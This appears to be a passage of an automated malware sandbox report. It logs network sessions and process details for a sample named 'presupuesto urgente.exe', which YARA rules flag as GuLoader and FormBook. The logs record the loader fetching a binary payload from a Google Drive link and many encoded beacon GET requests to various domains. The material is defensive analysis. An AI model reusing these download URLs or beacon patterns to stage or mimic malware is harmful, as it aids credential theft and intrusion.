                                                                                                                                                    Data Ascii: rXHio1ZyYl3A7kPTWM7ZSF6gsIv5JpFy+Q719cF8gnJFDS3Yc+0KC+OV2dLXYu6zuXYJGKp2P1JnEbuMGGZMfDzopXCUfwG+WebwxLHrfJQJ6Ai/cStJfTF7H26fTjzBZN+UCTqjvPYO+J6Q4QC1iwgSPosVHcKEFohTpZaQeB+zxzilWpp496hnWr6h41T9K/X7DPIAbL7q9zWs3cK7Zw3G205fMHcZ37BQBHgI9NLc3x/31Ye
Oct 4, 2024 12:03:54.671202898 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
84 | 192.168.11.20 | 49816 | 91.195.240.19 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:03:57.192121029 CEST | 428 | OUT | GET /71zx/?aPfP=cNoDEx_hrvchZzh&PbG=AARSfT6a63OJ+ysKR1MfeqvfIcR88MbG43x9Boc0SUqgrVW8gAnMDpyGPh1Ao5w62hQmbE5oBsYcO67emJ0/QAD3KEhLGLbjOOzz32cV6rq6jXBkG/unsus= HTTP/1.1
                                                                                                                                                    Host: www.eagleup.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:03:57.373759985 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
85 | 192.168.11.20 | 49826 | 91.195.240.19 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 4, 2024 12:04:40.062792063 CEST | 425 | OUT | GET /71zx/?PbG=AARSfT6a63OJ+ysKR1MfeqvfIcR88MbG43x9Boc0SUqgrVW8gAnMDpyGPh1Ao5w62hQmbE5oBsYcO67emJ0/QAD3KEhLGLbjOOzz32cV6rq6jXBkG/unsus=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.eagleup.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:04:40.249202013 CEST208INHTTP/1.1 403 Forbidden
                                                                                                                                                    content-length: 93
                                                                                                                                                    cache-control: no-cache
                                                                                                                                                    content-type: text/html
                                                                                                                                                    connection: close
                                                                                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID  Source IP      Source Port  Destination IP   Destination Port
86          192.168.11.20  49827        185.134.245.113  80

Timestamp                            Bytes transferred  Direction  Data
Oct 4, 2024 12:04:45.456777096 CEST  434                OUT        GET /nx20/?PbG=8vcjr86XrLXs9zoo4Sbw2W0gZ8lR0lTZYK7QcbRHGaq0PO2TKOaDXsXOeOMyJFeHWY2gT4U9V3ZC0yqdvgyuEBIfFkSzE9mWCbx3wnDzhu0DVN3ggTcLq/o=&m2W4y=eLqP3zSpfDT HTTP/1.1
    Host: www.strategyvanguard.com
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en
    Connection: close
    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:04:45.647903919 CEST  1289               IN         HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 04 Oct 2024 10:04:45 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Expires: Fri, 04 Oct 2024 11:04:45 GMT
    Cache-Control: max-age=3600
    Cache-Control: public
                                                                                                                                                    Data Ascii: 1560<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <script src="/punycode.min.js"></script> <title>www.strategyvanguard.com is parked</title> <style> * { margin: 0; padding: 0; } body { background: #ccc; font-family: Arial, Helvetica, sans-serif; font-size: 11pt; text-align: center; } h1 { margin: 10px auto 20px 10px; color: #3498db; } p { display: inline-block; min-width: 200px; margin: auto 30px 10px 30px; } .container { position: relative; text-align: left; min-height: 200px; max-width: 800px; min-width: 450px; margin: 15% auto 0px auto; background: #ffffff; border-radius: 20px; padding: 20px; box-sizing: border-box; } img.logo { width: auto; [TRUNCATED]


Session ID  Source IP      Source Port  Destination IP   Destination Port
87          192.168.11.20  49828        184.73.212.51    80

Timestamp                            Bytes transferred  Direction  Data
Oct 4, 2024 12:04:50.770885944 CEST  431                OUT        GET /b2tl/?PbG=WInfWL97QekdPalSc67opDsfGENLX06TmGNVEv6Geo+doMJXHAo9/Rqdqw5O1dkupHqa0ILlPiguACBnPWEgxg52+Lm0TB3eeiGyfSWC0M759S5RsmGy+TM=&m2W4y=eLqP3zSpfDT HTTP/1.1
    Host: www.philippatston.com
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en
    Connection: close
    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:04:50.872040033 CEST  1289               IN         HTTP/1.1 200 OK
    Date: Fri, 04 Oct 2024 10:04:50 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
                                                                                                                                                    Data Ascii: 315a<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]


Session ID  Source IP      Source Port  Destination IP   Destination Port
88          192.168.11.20  49829        199.192.19.19    80

Timestamp                            Bytes transferred  Direction  Data
Oct 4, 2024 12:04:57.359771967 CEST  426                OUT        GET /44em/?PbG=iGO2pBA+GdZFzSp95ITiNE0UdXGz/GDPPTuDgRXb9x0A8cbI0BsffOr86U/ry5cw9/6dj1rDQbqcJPAE3iEy6ACI9UEhGVzT4hJYYQarhHeSOj2eWmeo6uY=&m2W4y=eLqP3zSpfDT HTTP/1.1
    Host: www.stayvact.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en
    Connection: close
    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:04:57.557590008 CEST  1289               IN         HTTP/1.1 404 Not Found
    Date: Fri, 04 Oct 2024 10:04:57 GMT
    Server: Apache
    X-Frame-Options: SAMEORIGIN
    Content-Length: 16026
    X-XSS-Protection: 1; mode=block
    Connection: close
    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                                                                                                    Data Ascii: mit="10" x1="323.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx="323.666" cy="2
                                                                                                                                                    Oct 4, 2024 12:04:57.558515072 CEST1289INData Raw: 09 09 09 4d 33 30 31 2e 33 30 31 2c 33 34 37 2e 36 36 63 2d 31 2e 37 30 32 2c 30 2e 32 34 32 2d 35 2e 39 31 2c 31 2e 36 32 37 2d 37 2e 34 39 32 2c 32 2e 35 33 36 6c 2d 34 37 2e 39 36 35 2c 32 37 2e 33 30 31 63 2d 36 2e 36 36 34 2c 33 2e 38 32 39
                                                                                                                                                    Data Ascii: M301.301,347.66c-1.702,0.242-5.91,1.627-7.492,2.536l-47.965,27.301c-6.664,3.829-8.963,12.335-5.134,18.999h0c3.829,6.664,12.335,8.963,18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" s
                                                                                                                                                    Oct 4, 2024 12:04:57.741853952 CEST1289INData Raw: 36 39 2e 36 37 38 2c 33 39 34 2e 39 31 32 4c 32 36 39 2e 36 37 38 2c 33 39 34 2e 39 31 32 63 32 36 2e 33 2c 32 30 2e 36 34 33 2c 35 39 2e 36 35 34 2c 32 39 2e 35 38 35 2c 39 33 2e 31 30 36 2c 32 35 2e 37 32 34 6c 32 2e 34 31 39 2d 30 2e 31 31 34
                                                                                                                                                    Data Ascii: 69.678,394.912L269.678,394.912c26.3,20.643,59.654,29.585,93.106,25.724l2.419-0.114" /> </g> <g id="legs"> <g id="legR"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" strok


Session ID  Source IP      Source Port  Destination IP   Destination Port
89          192.168.11.20  49830        13.248.169.48    80

Timestamp                            Bytes transferred  Direction  Data
Oct 4, 2024 12:05:02.863312960 CEST  432                OUT        GET /9ned/?PbG=90J5hnkKMqWm95EdODHVgYU8jLlSuqUZOgFf/iPIyrVqxOp5uDPGdLjydK5bectxsy3BttRl3YyLMg8JhxE3vKKk0eEfvV9KpYS9gdBpjJtDcC1yxudRBLM=&m2W4y=eLqP3zSpfDT HTTP/1.1
Host: www.sleephygienist.org
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:05:02.964819908 CEST  397                IN         HTTP/1.1 200 OK
Server: openresty
Date: Fri, 04 Oct 2024 10:05:02 GMT
Content-Type: text/html
Content-Length: 257
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?PbG=90J5hnkKMqWm95EdODHVgYU8jLlSuqUZOgFf/iPIyrVqxOp5uDPGdLjydK5bectxsy3BttRl3YyLMg8JhxE3vKKk0eEfvV9KpYS9gdBpjJtDcC1yxudRBLM=&m2W4y=eLqP3zSpfDT"}</script></head></html>


Session ID  Source IP      Source Port  Destination IP   Destination Port
90          192.168.11.20  49831        43.252.167.188   80

Timestamp                            Bytes transferred  Direction  Data
Oct 4, 2024 12:05:08.283977032 CEST  434                OUT        GET /y6iz/?PbG=zhQ7Ngng1ztc3XJZIHU9Y/47AI96U2d0+kXKRZ9IAQQLMCXY95UFdstJ1SRqr3k6kIeJ8f3iCIfwSA0tHDQugE4jqofP6h0k5CYKv8JwRObuJO4PUIsN08g=&m2W4y=eLqP3zSpfDT HTTP/1.1
Host: www.xn--fhq1c541j0zr.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:05:08.587613106 CEST  367                IN         HTTP/1.1 404 Not Found
Date: Fri, 04 Oct 2024 10:14:52 GMT
Server: Apache
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>


Session ID  Source IP      Source Port  Destination IP   Destination Port
91          192.168.11.20  49832        31.217.192.158   80

Timestamp                            Bytes transferred  Direction  Data
Oct 4, 2024 12:05:13.801783085 CEST  429                OUT        GET /h9tv/?PbG=uYvkJTgHEMDqnDyAL7Bx5kFK4VB5WoBnzEJCknt6lKw0HVhBOb4vRoriyZLI8rcuBPdsMwWdB0wPJQDcXjXv1IKIZ3835bSH0Rj2yj0ArB004lLFoiTrAbQ=&m2W4y=eLqP3zSpfDT HTTP/1.1
Host: www.jennarauten.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:05:14.457730055 CEST  526                IN         HTTP/1.1 301 Moved Permanently
Connection: close
x-powered-by: PHP/8.3.11
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
content-type: text/html; charset=UTF-8
x-redirect-by: WordPress - Really Simple Security
location: https://www.jennarauten.com/h9tv/?PbG=uYvkJTgHEMDqnDyAL7Bx5kFK4VB5WoBnzEJCknt6lKw0HVhBOb4vRoriyZLI8rcuBPdsMwWdB0wPJQDcXjXv1IKIZ3835bSH0Rj2yj0ArB004lLFoiTrAbQ=&m2W4y=eLqP3zSpfDT
content-length: 0
date: Fri, 04 Oct 2024 10:04:24 GMT
server: LiteSpeed


Session ID  Source IP      Source Port  Destination IP   Destination Port
92          192.168.11.20  49833        191.101.104.164  80

Timestamp                            Bytes transferred  Direction  Data
Oct 4, 2024 12:05:19.627696037 CEST  428                OUT        GET /6s2u/?PbG=LwMCxBNtIktrMj9PGQiKtMV+LJeqJuCob/kDIT9BHmAZvs3jLOO+ZrbeOg0/fIrrzLQ8oyXz+hXEDm3lfyah8CLsJZYqemFEXJ3vaUcAfohhzVyFGy0IUEQ=&m2W4y=eLqP3zSpfDT HTTP/1.1
Host: www.taketechai.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:05:20.342416048 CEST  1289               IN         HTTP/1.1 301 Moved Permanently
Server: hcdn
Date: Fri, 04 Oct 2024 10:05:20 GMT
Content-Type: text/html
Content-Length: 795
Connection: close
location: https://www.taketechai.com/6s2u/?PbG=LwMCxBNtIktrMj9PGQiKtMV+LJeqJuCob/kDIT9BHmAZvs3jLOO+ZrbeOg0/fIrrzLQ8oyXz+hXEDm3lfyah8CLsJZYqemFEXJ3vaUcAfohhzVyFGy0IUEQ=&m2W4y=eLqP3zSpfDT
platform: hostinger
panel: hpanel
content-security-policy: upgrade-insecure-requests
alt-svc: h3=":443"; ma=86400
x-hcdn-request-id: e714f60609f56eb3b9225ad9040d36af-phx-edge4
x-hcdn-cache-status: MISS
x-hcdn-upstream-rt: 0.561
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h
Oct 4, 2024 12:05:20.342427969 CEST  78                 IN
Data Ascii: 2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID  Source IP      Source Port  Destination IP   Destination Port
93          192.168.11.20  49834        162.255.119.150  80

Timestamp                            Bytes transferred  Direction  Data
Oct 4, 2024 12:05:25.464319944 CEST  432                OUT        GET /ko0y/?PbG=Gn25S248vYwvg7Jg7plpNM/IO+qTcMdG7TQwLne03JpgtwdJKoWqeQtwalLznrJvxBqGQBXIB3Hty1ARVLJ66f5Bip3WtEch+Xr1s5xY01AltpXHCM6v1G8=&m2W4y=eLqP3zSpfDT HTTP/1.1
Host: www.297tamatest1kb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:05:25.578280926 CEST  1173               IN         HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 10:05:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 976
Connection: close
X-Served-By: Namecheap URL Forward
Server: namecheap-nginx
Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"><html> <head> <meta http-equiv='content-type' content='text/html; charset=UTF-8'> <meta name="KEYWORDS" content=""> <meta name="DESCRIPTION" content=""> <meta name="VERSION" content=""> <link href="" rel="shortcut icon" type="image/x-icon"> <title></title> </head> <frameset rows='100%, *' frameborder=no framespacing=0 border=0> <frame src="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame> </frameset> <noframes> <h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br> <center>Click <a href="http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com" >here</a> to enter the site.</center> </noframes></html>


Session ID  Source IP      Source Port  Destination IP   Destination Port
94          192.168.11.20  49835        91.195.240.19    80

Timestamp                            Bytes transferred  Direction  Data
Oct 4, 2024 12:05:41.122004986 CEST  429                OUT        GET /w8xy/?PbG=9uM5b9ZGQ2xGa/fVJtRXtYM44dIY5ZCO55UnrVzGgcPFgg1e058W5kaq/wWnc0Jau7/b/2o64CBh5aGCaOFYcZtnKviijE7Q36m7HNpI4xddvmt+atSlTsw=&1X=S8wx1XUpNBuXlv_ HTTP/1.1
Host: www.gipsytroya.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
Oct 4, 2024 12:05:41.308866024 CEST  208                IN         HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html
connection: close
Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49730 | 142.251.40.174 | 443 | 6412 | C:\Users\user\Desktop\presupuesto urgente.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-04 09:57:17 UTC | 216 | OUT | GET /uc?export=download&id=1lijlSqItQAppMrLvYydriCj6BfDO7ozU HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                                    Host: drive.google.com
                                                                                                                                                    Cache-Control: no-cache
2024-10-04 09:57:17 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:57:17 GMT
                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=1lijlSqItQAppMrLvYydriCj6BfDO7ozU&export=download
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                    Content-Security-Policy: script-src 'nonce-CXGCMvVJWlR9LZhSkWWOaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                    Server: ESF
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49731 | 142.250.176.193 | 443 | 6412 | C:\Users\user\Desktop\presupuesto urgente.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-04 09:57:18 UTC | 258 | OUT | GET /download?id=1lijlSqItQAppMrLvYydriCj6BfDO7ozU&export=download HTTP/1.1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                    Connection: Keep-Alive
2024-10-04 09:57:20 UTC | 4884 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                    Content-Security-Policy: sandbox
                                                                                                                                                    Content-Security-Policy: default-src 'none'
                                                                                                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                    X-Content-Security-Policy: sandbox
                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                    Cross-Origin-Resource-Policy: same-site
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Content-Disposition: attachment; filename="oFGkE47.bin"
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Allow-Credentials: false
                                                                                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 272448
                                                                                                                                                    Last-Modified: Fri, 04 Oct 2024 07:59:38 GMT
                                                                                                                                                    X-GUploader-UploadID: AD-8ljtg91I4Rtx_lgv62qcLG3q6_PjP6JecpYaFIHbabMcoaqiPCv6QfDmXwX4HCiZeifwlVtE
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:57:20 GMT
                                                                                                                                                    Expires: Fri, 04 Oct 2024 09:57:20 GMT
                                                                                                                                                    Cache-Control: private, max-age=0
                                                                                                                                                    X-Goog-Hash: crc32c=4lk7Mg==
                                                                                                                                                    Server: UploadServer
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Connection: close



                                                                                                                                                    Target ID:0
                                                                                                                                                    Start time:05:56:27
                                                                                                                                                    Start date:04/10/2024
                                                                                                                                                    Path:C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\presupuesto urgente.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:582'088 bytes
                                                                                                                                                    MD5 hash:8AE672783481C0B46780431BFCE5A216
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.8108880079.00000000045E8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:2
                                                                                                                                                    Start time:05:57:12
                                                                                                                                                    Start date:04/10/2024
                                                                                                                                                    Path:C:\Users\user\Desktop\presupuesto urgente.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\presupuesto urgente.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:582'088 bytes
                                                                                                                                                    MD5 hash:8AE672783481C0B46780431BFCE5A216
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.8372536747.00000000331E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.8372536747.00000000331E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.8373636229.0000000034250000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.8373636229.0000000034250000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.8355119953.0000000002B38000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:3
                                                                                                                                                    Start time:05:57:37
                                                                                                                                                    Start date:04/10/2024
                                                                                                                                                    Path:C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe"
                                                                                                                                                    Imagebase:0x580000
                                                                                                                                                    File size:140'800 bytes
                                                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.12650331699.00000000013B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
